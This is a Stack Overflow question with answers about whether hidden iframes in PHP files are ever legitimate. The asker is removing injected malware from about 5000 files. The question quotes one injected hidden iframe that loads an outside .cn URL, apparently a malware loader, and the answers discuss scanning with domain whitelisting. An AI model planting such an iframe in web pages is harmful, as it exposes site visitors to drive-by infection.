# Is there any legit use for hidden iframe in php?

Tags: c#, php, iframe

Is there any legit use for `hidden iframe`? I've got viruses as per [Can a file be read and written right back with small changes without knowing its encoding in C#?](https://stackoverflow.com/questions/9219358/can-a-file-be-read-and-written-right-back-with-small-changes-without-knowing-its) which are all over the php files (it seems one entry per file but can't be sure with 5000 files).

The ones I found have this but I can't be sure there are others with something a bit different inside. Could I assume all `iframe` where visibility is `hidden` are malicious?

`<iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe>`

Or maybe there's other way I could tell my c# code to look at it? I don't want to break the files and websites but I can't just look for exact value as I may miss something.

Comment: Interesting thing happens if I edit the post and won't use ` the iframe code won't be displayed..

Answer (score 2, accepted):

A hidden `IFRAME` can certainly be useful for malicious purposes, but it can be used legitimately. For example, you could use a hidden `IFRAME` to emulate asynchronous calls to the server (ASP.Net did this at one point, if I recall).

I have also used `IFRAMEs` to get around file upload control limitations (both hidden and visible `IFRAMEs` can be useful for this).

Suspicious, but not malicious by default.

Answer (score 1):

Some old traffic counters I've seen use hidden iFrames to count traffic, but that's about the only legitimate usage of a hidden iFrame; I certainly don't like it and if it were me, I would remove those as well.

Another thing you could check for is if the iFrame was hidden and the source is not from your domain.

Comment: There will be multiple sites/domains in the file search. I will be going thru whole server so hard to say if it's my domain or not.

Comment: You could create the script to log results that way you could look through each one to see if it's legit, then if any are legit, create a domain whitelist, then have the script remove any hidden iframes that aren't in the whitelist.

Comment: I guess I could do this :-) Nice suggestion